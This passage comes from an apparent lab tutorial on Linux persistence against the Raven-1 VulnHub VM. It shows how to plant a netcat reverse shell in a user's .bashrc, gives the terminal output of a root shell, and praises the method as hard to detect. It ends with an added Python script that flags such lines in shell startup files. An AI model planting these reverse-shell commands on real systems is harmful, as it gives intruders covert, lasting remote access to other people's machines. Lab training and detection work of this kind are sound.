- Kali Linux OR Parrot OS
- Practical understanding of TCP/IP
- The tutorial was conducted against a compromised Linux virtual machine that has been set up to demonstrate the process of exploitation and privilege escalation. It can be downloaded here:
https://www.vulnhub.com/entry/raven-1,256/
Goal:
The intention is to secure a presence on the Linux target once an initial entry point has been acquired.
PART 4. UNIX SHELL CONFIGURATION MODIFICATION:
This persistence method entails inserting a bash reverse-shell command, which initiates a connection back to our netcat listener, into a user account's .bashrc file. The .bashrc file is a configuration file used to personalise bash, and it is executed when a user logs in with the bash shell (and, more generally, whenever that user starts an interactive bash shell).
The first step is to open the .bashrc file in a text editor, which is done with the following command:
Code:
nano ~/.bashrc
With the file open in the editor, we can add a single bash command that will give us a reverse shell each time the user logs in. This is done by inserting the following line:
Code:
nc -e /bin/bash <KALI-IP> <PORT> 2>/dev/null
As shown in the terminal below, the command must contain your Kali IP and the port on which netcat is listening.
Terminal:
# Some more alias to avoid making mistakes:
# alias rm=' rm -i'
# alias cp=' cp -i'
# alias mv=' mv -i'
nc -e /bin/bash 192.168.2.2 1234 2>/dev/null
Having added the bash command to the .bashrc file, we then start a Netcat listener on Kali with the following command:
Code:
nc -nvlp <PORT>
When a user logs in to that account, the command embedded in the .bashrc file is triggered and immediately provides a reverse shell on the netcat listener, as shown in the terminal below.
Terminal:
$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.2.2] from (UNKNOWN) [192.168.2.100] 50123
id
uid=0(root) gid=0(root) groups=0(root)
We have now established a degree of persistence by means of the .bashrc file. This method is particularly advantageous because the reverse shell command is concealed inside a legitimate configuration file, which reduces the likelihood of detection.
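The same property that makes this persistence convenient, namely that the command lives in a file every shell reads, also makes it straightforward to audit. The following Python script is an added example, not part of the original tutorial: it scans .bashrc-style text for command lines that launch netcat with -e, ncat with --exec, or bash's /dev/tcp redirection, and runs over a constructed copy of the modified file shown above (the listener address 203.0.113.5 is a documentation placeholder).

```python
import os
import re

# (pattern, description) pairs, matched against each non-comment line.
# A user's shell startup file has no legitimate reason to contain these.
SUSPICIOUS = [
    (r"\bnc\b.*\s-\w*e\b", "netcat with -e (run a program on connect)"),
    (r"\bncat\b.*--exec", "ncat --exec"),
    (r"/dev/tcp/", "bash /dev/tcp network redirection"),
]
RC_FILES = [".bashrc", ".bash_profile", ".bash_login", ".profile", ".zshrc"]

def audit_rc(text):
    """Return (line_no, line, reason) for each suspicious non-comment line."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank lines and comments never execute
        for pattern, reason in SUSPICIOUS:
            if re.search(pattern, stripped):
                findings.append((no, stripped, reason))
                break
    return findings

def audit_home(home):
    """Scan the usual shell startup files under one home directory."""
    results = {}
    for name in RC_FILES:
        path = os.path.join(home, name)
        if os.path.isfile(path):
            with open(path, errors="replace") as fh:
                hits = audit_rc(fh.read())
            if hits:
                results[path] = hits
    return results

# Constructed sample mirroring the tutorial's edited .bashrc; 203.0.113.5 is a
# documentation address standing in for the attacker's listener.
SAMPLE_BASHRC = """\
# Some more alias to avoid making mistakes:
# alias rm='rm -i'
# alias cp='cp -i'
alias ll='ls -l'
nc -e /bin/bash 203.0.113.5 1234 2>/dev/null
"""

if __name__ == "__main__":
    for no, line, reason in audit_rc(SAMPLE_BASHRC):
        print(f"line {no}: {reason}: {line}")
```

Run audit_home() over each directory in /home (and /root) from a cron job or configuration-management check, and compare the files against a known-good baseline to catch additions that the patterns miss.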